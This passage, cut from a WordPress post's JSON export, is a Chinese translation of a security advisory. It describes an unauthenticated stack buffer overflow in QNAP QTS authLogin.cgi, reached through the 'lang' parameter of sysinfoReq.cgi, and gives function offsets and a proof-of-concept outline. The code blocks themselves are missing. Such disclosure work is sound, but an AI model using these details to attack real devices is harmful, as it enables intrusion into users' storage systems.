authLogin.cgi\u8d1f\u8d23\u663e\u793a\u6765\u81eaWeb\u754c\u9762\u7684\u7cfb\u7edf\u4fe1\u606f\uff0c\u5e76\u4e14\u5305\u542b\u5728\u7528\u6237\u63d0\u4f9b\u7684\u8f93\u5165\u8fdb\u884c\u65e0\u9650\u5236\u7684sprintf\u8c03\u7528\u4e2d\u3002 authLogin.cgi\u4e8c\u8fdb\u5236\u6587\u4ef6\uff0c\u4f4d\u4e8eQTS\u6587\u4ef6\u7cfb\u7edf\u7684\/home\/httpd\/cgibin\/\u76ee\u5f55\u4e2d\uff0c\u53ef\u901a\u8fc7\u8bf7\u6c42\u7aef\u70b9\/cgi-bin\/sysinfoReq.cgi\u8fdb\u884c\u8bbf\u95ee\u3002 \u8be5\u4e8c\u8fdb\u5236\u6587\u4ef6\u662fQTS\u7684\u4e00\u90e8\u5206\uff0c\u5e76\u5145\u5f53\u51e0\u4e2a\u529f\u80fd\u7684\u5305\u88c5\u5668\u3002 \u6613\u53d7\u653b\u51fb\u7684\u8c03\u7528\u4f4d\u4e8ehandle_qpkg()\uff080x1C680\uff09\u51fd\u6570\u4e2d\uff0c\u8be5\u51fd\u6570\u7531handle_sysInfoReq()\uff080x1D398\uff09\u8c03\u7528\uff0c\u4ee5\u663e\u793a\u5f53\u524d\u7cfb\u7edf\u4fe1\u606f\uff08\u578b\u53f7\u540d\u79f0\uff0c\u56fa\u4ef6\u7248\u672c\uff0cecc\uff09\u3002 [crayon-5a383ee2c6288334669193\/] \u901a\u8fc7\u5411sysinfoReq.cgi\u53d1\u9001\u4e00\u4e2aHTTP\u8bf7\u6c42\uff0chandle_sysInfoReq()\uff080x1D398\uff09\u51fd\u6570\u88ab\u89e6\u53d1\uff0c\u5e76\u4e14\u6839\u636e\u63d0\u4f9b\u7684\u53c2\u6570\uff0c\u53ef\u4ee5\u5904\u7406\u4e0d\u540c\u7684\u8fdb\u7a0b\u6b65\u9aa4\u3002 [crayon-5a383ee2c628f233726429\/] \u5982\u679c\u63d0\u4f9b\u4e86qpkg HTTP\u53c2\u6570\uff0c\u5219\u8c03\u7528handle_qpkg()\uff080x1C680\uff09\u51fd\u6570\u3002 [crayon-5a383ee2c6292299287155\/] handle_qpkg()\u51fd\u6570\u4e0d\u4f1a\u9a8c\u8bc1\u7528\u6237\u63d0\u4f9b\u7684lang HTTP\u53c2\u6570\u503c\u3002 \u6b63\u5982\u4e0a\u9762\u7684\u4ee3\u7801\u8def\u5f84\u6240\u793a\uff0c\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u653b\u51fb\u8005\u53ef\u4ee5\u4e3a\u6240\u8ff0\u53c2\u6570\u63d0\u4f9b\u4efb\u610f\u5927\u5c0f\u7684\u503c\uff0c\u7136\u540e\u901a\u8fc7sprintf()\u51fd\u6570\u8c03\u7528\u5c06\u5176\u8fde\u63a5\u5230\u9759\u6001\u5927\u5c0f\uff08\u5806\u6808\uff09\u7f13\u51b2\u533a\u4e0a\u7684\u73b0\u6709\u5b57\u7b26\u4e32\u3002 \u6f0f\u6d1e\u8bc1\u660e \u901a\u8fc7\u53d1\u9001\u4ee5\u4e0bPOST\u8bf7\u6c42\uff0c\u6211\u4eec\u5c06\u4f7f\u5806\u6808\u6ea2\u51fa\u5e76\u7528XXXX\u8986\u76d6qpkg_all_info\u7f13\u51b2\u533a\u7684\u503c\uff0c\u5e76\u7528YYYY\u8986\u76d6handle_qpkg()\u53c2\u6570\u8fd4\u56de\u5730\u5740\u7684\u503c\uff0c\u4ece\u800c\u9020\u6210\u5d29\u6e83\u3002 [crayon-5a383ee2c6295336007302\/] \u4ea7\u751f\u4ee5\u4e0b\u5d29\u6e83\uff1a [crayon-5a383ee2c629a114636077\/]<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[12033,15774,11682,10757,12136],"class_list":["post-10886","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-buffer-overflow","tag-chinese-translation","tag-remote-code-execution","tag-securiteam-secure-disclosure","tag-unauthenticated-action"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10886","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=10886"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10886\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=10886"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=10886"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=10886"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}